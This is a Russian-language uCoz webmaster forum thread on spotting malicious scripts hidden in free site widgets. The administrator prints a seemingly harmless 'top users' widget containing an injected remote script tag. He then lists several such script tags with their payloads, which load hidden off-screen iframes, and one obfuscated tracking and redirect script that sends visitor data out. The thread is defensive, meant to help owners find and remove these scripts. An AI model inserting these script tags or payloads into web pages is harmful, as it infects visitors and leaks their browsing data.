Как обнаружить вирус на сайте uCoz - Форум веб маcтера uCoz | Делай сайт
Приветствую Вас, Гость! Регистрация
Георгиевская ленточка
Воскресенье, 11.12.2016
[ Новые сообщения · Участники · Правила форума · Поиск · RSS ]




Русские шрифты



Страница 1 из 11
Форум веб маcтера uCoz » uCoz » Удаление вирусов на сайте uCoz » Как обнаружить вирус на сайте uCoz (Список и описание вирусов распространяемых на сайтах)
Как обнаружить вирус на сайте uCoz
IZOTOP Дата: Вторник, 25.12.2012, 12:03 | Сообщение # 1
Группа: Администратор
Сообщений: 55
Статус: Offline
Предлагаю Вашему вниманию ознакомиться с распространяемыми вирусами.Подобные вирусы могут находиться в скриптах предлагаемых веб мастерам для установки на сайт.То есть имеются в виду любые элементы,часы,информеры,виды материалов,плееры и т.д.Вредоносный код может быть внедрён (вписан,дописан) к любому работоспособному и безобидному скрипту для сайта.
Вот пример на первый взгляд безобидного скрипта "Топ пользователей" для сайта юКоз.

Код
<div class="screenshot">
<table cellspadding="0" class="topten_table" style="border-color: #000000; width: 100%; margin: 0px;" cellspacing="0">      
<tbody>
<tr>      
<td style="padding: 2px 0px 2px 4px; cursor: pointer; border-left: 0px; width: 48px;" onclick="'';">
<center>
<?if($AVATAR_URL$)?>
<script src="http://xall-pc.ru/up.js" type="text/javascript"></script>
<img title="$USERNAME$" class="userAvatar" src="$AVATAR_URL$" border="0" height="48" width="48"><?else?>      
<IMG SRC="http://bambun.ru/images/noav9atar.png" BORDER="0" width="48" height="48">
<?endif?>
</center>      
</td>
<td style="padding: 2px 0px 2px 4px; cursor: pointer; border-left: 0px; text-align: left; font-size: 10px; font-family: tahoma, verdana, arial; color: #555555; line-height: 14px;" onclick="';">
<font style="font-size: 12px; color: #000000;"><b>$USERNAME$</b> ($NUMBER$ место)</font>
<font color="#1882ed">$GROUP_NAME$</font>
<br> Релизов: <b>
<font color="#000000">$LOAD_POSTS$</font>
</b>
Форум: <b>
<font color="#000000">$FORUM_POSTS$</font>
</b>
</td>      
</tr>      
</tbody>      
</table>
</div>
<br>


Этот скрипт будет исправно работать и не предвещать беды ( до поры,до времени ),потому что в нём находится вредоносный код скрипта,вот он ▼

Код
<script src="http://xall-pc.ru/up.js" type="text/javascript"></script>


Вот содержимое вредоносного кода ▼

Код
document.write('<iframe src="http://yanreyaa.pp.ua" style="position:absolute;left:-9999px;top:-9999px;" width="468" height="70"></iframe>');


Объясняю что это такое,и как оно работает.
Команда document.write выводит информацию,дальше в скобках прописывается выводимая информация,в этом случае это "фрейм" в виде тега iframe который представляет собой страницу с установленным адресом и размерами.
Для "фрейма" прописаны стили (style),это довольно интересное свойство position которому придали значение абсолютного позиционирования.При абсолютном позиционировании основную роль играют свойства положения,здесь они представлены в виде свойств left и top где left (положение от левого края видимого пространства страницы) а top (положение от верхней части видимого пространства страницы).
Теперь представьте себе такую картину,обоим свойствам придали значение -9999px,а это фактически 10000 пикселей и со знаком минус,значит страница размерами 468Х70 смещена далеко за пределы видимого пространства,другими словами её просто не видно.
В этом материале находится "Редактор для проверки работы скриптов и стилей",он находится в левом нижнем углу страницы,с его помощью можно продемонстрировать положение подобного элемента.
Возьмём для демонстрации блок с аналогичными размерами и значениями позиционирования (скопируйте код,нажмите кнопку активации редактора и скопируйте в него этот код ▼

Код
<div style="position:absolute;left:-9999px;top:-9999px;width:468px;height:70px;background-color:red;"></div>


Как видите блока красного цвета не видно.Изменим значения свойствам положения на положительные,например 10px (скопируйте этот код,активируйте редактор и вставьте в редактор) ▼

Код
<div style="position:absolute;left:10px;top:10px;width:468px;height:70px;background-color:red;"></div>


Вот появился и наш блок,отступая от верхней и от левой части на 10 пикселей.
Вернёмся к самому вирусу,он может себя не проявлять пока на страницу "фрейма" его хозяин не добавит зловредных элементов которые начнут себя проявлять перекидывая на другие сайты или вредить иными способами,но не думайте что все "фреймы" несут вред,они как кухонный нож который можно использовать как в добрых так и в корыстных целях.
Всё это я раскладываю для тех кто слабо разбирается,остальных прошу не считать это нудным.
Если кто не смог разобраться о чём велась речь можете в комментарии изложить непонятные для вас описания,постараюсь быть более объективным.
Далее хочу предоставить Вам список зловредных кодов с их содержимым,если заметите их в предлагаемых скриптах - удаляйте,без них всё будет работать как полагается.

Список вредоносных кодов - вирусов

Вредоносный код №1

Код
<script src="http://china-air.ru/tsed.js" type="text/javascript"></script>


Содержимое вредоносного кода №1

Код
document.write('<iframe src="http://china-air.ru/" style="width: 72px; left: -1581px; position: absolute;"></iframe>');


Вредоносный код №2

Код
<script src="http://xall-pc.ru/up.js" type="text/javascript"></script>


Содержимое вредоносного кода №2

Код
document.write('<iframe src="http://yanreyaa.pp.ua" style="position:absolute;left:-9999px;top:-9999px;" width="468" height="70"></iframe>');


Вредоносный код №3

Код
<script src="http://sanpb.ru/text.js" type="text/javascript"></script>


Содержимое вредоносного кода №3

Код
document.write('<iframe src="http://yanreyaa.pp.ua" style="position:absolute;left:-9999px;top:-9999px;" width="468" height="70"></iframe>');


Вредоносный код №4

Код
<script src="http://cm4fan.ru/none.js" type="text/javascript"></script>


Содержимое вредоносного кода №4

Код
document.write('<iframe src="http://yanreyaa.pp.ua" style="position:absolute;left:-9999px;top:-9999px;" width="468" height="70"></iframe>');


Вредоносный код №5

Код
<script src="http://am-investor.ru/higer.js" type="text/javascript"></script>


Содержимое вредоносного кода №5

Код
document.write('<iframe src="http://gjutfr865oyio-tcrfvg.changeip.name" style="width: 72px; left: -1581px; position: absolute;"></iframe>');


Вредоносный код №6 - новый (добавлен 15.01.2013)

Код
<script src="http://activiks.ru/img/png.js" type="text/javascript"></script>


Содержимое вредоносного кода №6

Код
document.write('<iframe src="http://activiks.ru" style="position:absolute;left:-9999px;top:-9999px;" width="468" height="70"></iframe>');


Вредоносный код №7 - новый (добавлен 28.01.2013)

Код
<script language='javascript' type='text/javascript'   
src='http://linkpeoples.com/7pg0t744isc7uyuk1o268kz477muamt'></script>


Содержимое вредоносного кода №7

Код
if (typeof ar_exposure_price === 'undefined') {var ar_exposure_price = -2;} var test, ppdr_url; if ( !window.p8856c068c8fa54cecd7fcfb11d22b14a ) { p8856c068c8fa54cecd7fcfb11d22b14a = 0; } (function (){ var b= (function () { var s; var d = document.createElement('div'); if ( window.getComputedStyle ) { s = window.getComputedStyle( d, null ); } else if ( d.currentStyle ) { s = d.currentStyle; } else { return {}; } var b = {}; var r = { o : /^O[A-Z]/, w : /^webkit[A-Z]/, m : /^ms[A-Z]/, f : /^Moz[A-Z]/ }; for ( var k1 in s ) { for (var k2 in r ) { if ( r[k2].test(k1) ) { b[k2] = true; } } } return b; };)); var ref = (document.referrer&&document.referrer!="") ? '&n22wwi='+escape(document.referrer) : ''; var seed = '&55oey61g=t'+Math.round(Math.random()*100000000); var referer = escape(window.location.href); var words = [ { r: /порн(о|уха|графия)/ig, s: 10 }, { r: /sex/ig, s: 10 }, { r: /seks/ig, s: 10 }, { r: /проститу[тц]/ig, s: 7 }, { r: /эроти[кч]/ig, s: 5 }, { r: /секс/ig, s: 5 }, { r: /стриптиз/ig, s: 4 }, { r: /сиськи/ig, s: 4 }, { r: /попки/ig, s: 4 }, { r: /отсос/ig, s: 5 }, { r: /сос(ать|ет)/ig, s: 5 }, { r: /гол(ые|ая)/ig, s: 4 }, { r: /Дойки/ig, s: 10 }, { r: /БДСМ/ig, s: 10 }, { r: /xxx/ig, s: 7 }, { r: /sex/ig, s: 10 }, { r: /porn/ig, s: 10 }, { r: /adult/ig, s: 7 }, { r: /ххх/ig, s: 3 } ], ft = 0, fk = 0, fd = 0, fu=0, match; for (var i=0,word;word=words[i];i++){ if (match = document.title.match(word.r)) { ft += word.s * match.length; } } var doc_url = document.URL.toLowerCase(); for (var i=0,word;word=words[i];i++){ if (match = doc_url.match(word.r)) { fu += word.s * match.length*10; } } var meta = document.getElementsByTagName('meta'); for (var j=0,t;t=meta[j++];) { if (t.name.toLowerCase() === 'keywords') { for (var i=0,word;word=words[i];i++){ if (match = t.content.match(word.r)) { fk += word.s * match.length; } } } if (t.name.toLowerCase() === 'description') { for (var i=0,word;word=words[i];i++){ if (match = t.content.match(word.r)) { fd += word.s * match.length; } } } } test = fu; document.write('<div class="ccs"><script charset="windows-1251" type="text/javascript" language="javascript" src="http://oskale.ru/6uyhnbnv4uijirt52"></script><script charset="windows-1251" type="text/javascript" language="javascript" src="http://bormoni.ru/8mpareiw3m38cjc0ag15qlehq?'+ref+'"></script><script charset="windows-1251" type="text/javascript" language="javascript" src="http://linkpeoples.com/68sayqqjbz066jlbw254y5g2m"></script> </div>');p8856c068c8fa54cecd7fcfb11d22b14a++; ppdr_url = 'http://linkpeoples.com/963qlrfrdi48ed9qs3pr107mnu8nuf2o34nwdxzk4?'+ref+seed + (top == window ? '' : '&wrcsqfwpr=1')+'&5eadlulsi8ankt='+referer+'&4j0n4='+ft+'&3ihwf='+fk+'&3lb0w='+fd+'&496o1='+fu+'&11tlgaxqha='+p8856c068c8fa54cecd7fcfb11d22b14a+'&rajg6tx0b='+(b.o?1:0)+'&83cfp3gfhp7='+(b.w?1:0)+'&6gyk9lkkqpslef='+(b.f?1:0)+'&5fdgde6t='+(b.m?1:0)+''; };))


Разумеется что это не все зловредные коды,при появлении сведений о новых вирусах информация будет добавлена в этом материале.
Если Вам знакомы иные ссылки на вирусные сайты,прошу выкладывать сведения о них в этом материале.
Пусть тот кто не уважает чужой труд сам трудится в пустую.



 
jaster Дата: Четверг, 30.05.2013, 08:18 | Сообщение # 2
Группа: Вебмастер
Сообщений: 1
Статус: Offline
Кто может рассказать про доверительное управление активами? Услуга полезная, особенно когда на планирование домашнего бюджета нет времени. Пока деньги зарабатываешь, даже большие некогда думать, что с ними дальше делать...
http://pif-energ.ru/management/wealth-management/
 
IZOTOP Дата: Пятница, 31.05.2013, 13:22 | Сообщение # 3
Группа: Администратор
Сообщений: 55
Статус: Offline
Цитата
рассказать про доверительное управление активами

К сожалению мне такая тема не совсем знакома.
Но я немного разбираюсь в управлении и формировании сайтом, на Вашем большое количество ошибок некоторые из которых являются грубыми.
Измените хотя бы значение тега title идёт повторение:

Код

<title>Доверительное управление и доверительное управление активами</title>


на

Код

<title>Доверительное управление активами</title>


и удалите в зоне head повторяющийся мета тег:

Код

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />


это кстати тоже ошибка:

Код

<meta name="keywords" content="Ключевые слова" />


Ну это так, по быстрому не осматривая остального.
 
MasterBel Дата: Суббота, 28.12.2013, 19:43 | Сообщение # 4
Группа: Вебмастер
Сообщений: 5
Статус: Offline
Сервис по выявлению вирусов на сайте ссылка
Помогает на все 100 %

Как не допустить попадания вируса на сайт:
Ну во первых, не храните пароль для доступа в ПУ в браузере - у меня он там хранился;
Во вторых, не ставьте скрипты непроверенных партнерок к себе на сайт;
Для своевременного выявления вируса периодически просматривайте свой сайт в разных браузерах. Иногда такой бывает парадокс, Мозила предупреждает, что на сайте вирус, а вот, к примеру, Хром нет. Или наоборот.


Сообщение отредактировал MasterBel - Суббота, 28.12.2013, 19:51
 
IZOTOP Дата: Воскресенье, 29.12.2013, 23:26 | Сообщение # 5
Группа: Администратор
Сообщений: 55
Статус: Offline
Цитата MasterBel ()
Сервис по выявлению вирусов на сайте


Вот тоже неплохой Антивирус Онлайн вместо файла можно в поле вставить ссылку на сайт, проверка производится 41 антивирусом.
 
MasterBel Дата: Пятница, 03.01.2014, 12:37 | Сообщение # 6
Группа: Вебмастер
Сообщений: 5
Статус: Offline
Цитата IZOTOP ()
Вот тоже неплохой Антивирус Онлайн вместо файла можно в поле вставить ссылку на сайт, проверка производится 41 антивирусом.

Сервис то конечно классный, но немного по моему мнению не удобен....
 
suertudo Дата: Пятница, 14.02.2014, 17:22 | Сообщение # 7
Группа: Вебмастер
Сообщений: 1
Статус: Offline
crazy Я 3 часа потратил на поиск этого скрипта. Перевернул весь сайт. Наконец нашел и удалил. Ух попался бы создатель этлого скрипта мне тогда killed
 
IZOTOP Дата: Понедельник, 03.03.2014, 12:31 | Сообщение # 8
Группа: Администратор
Сообщений: 55
Статус: Offline
Цитата suertudo ()
Я 3 часа потратил на поиск этого скрипта.


Видно у Вас мало содержимого, можно и 3 дня копаться, доводилось самому sad
 
IZOTOP Дата: Воскресенье, 16.03.2014, 21:21 | Сообщение # 9
Группа: Администратор
Сообщений: 55
Статус: Offline
С сайта http://dav-info.ucoz.ru был удалён скрипт вирус с рекламой, будьте осторожны.

Код

<script async charset='UTF-8' language='javascript' type='text/javascript' src='http://iqmasa.ru/6rzofz8uuc28ef8pehs6rx5nbidd8hra473w3yk0c1n9d39'></script>


Прикрепления: 7240628.jpg(181Kb)
 
Monster Дата: Вторник, 06.05.2014, 02:12 | Сообщение # 10
Группа: Вебмастер
Сообщений: 1
Статус: Offline
Ребят! А можна Вам скинуть код, а вы посмотрите есть ли там вирус или нет?
 
IZOTOP Дата: Четверг, 08.05.2014, 00:39 | Сообщение # 11
Группа: Администратор
Сообщений: 55
Статус: Offline
Цитата Monster ()
есть ли там вирус или нет


Скидывай, посмотрим что там...
 
Форум веб маcтера uCoz » uCoz » Удаление вирусов на сайте uCoz » Как обнаружить вирус на сайте uCoz (Список и описание вирусов распространяемых на сайтах)
Страница 1 из 11
Поиск:



Русские шрифты